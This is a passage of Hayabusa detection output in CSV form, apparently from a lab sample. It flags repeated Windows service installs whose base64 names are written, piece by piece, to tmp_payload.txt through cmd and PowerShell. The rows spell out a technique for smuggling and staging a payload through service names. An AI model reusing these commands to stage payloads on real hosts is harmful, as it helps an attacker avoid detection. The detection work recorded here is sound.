+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:26.398 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAkTG9nSW5mby5BZGQoIkVuZFRpbWUiLCAkTmV3ZXN0RXZlbnRUaW1lKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiTG9nU2l6ZSIsICRMb2dTaXplKQ0KICAgICAgICAjJExvZ0luZm8u | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:27.853 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: QWRkKCJPU1ZlcnNpb24iLCAkT1NWZXJzaW9uKQ0KDQogICAgICAgICRMb2dJbmZvLkFkZCgiVG90YWxFdmVudHMiLCAkVG90YWxMb2dFdmVudHMpDQoNCiAgICAgICAgJExvZ0luZm8uQWRkKCJBdm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:33.680 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 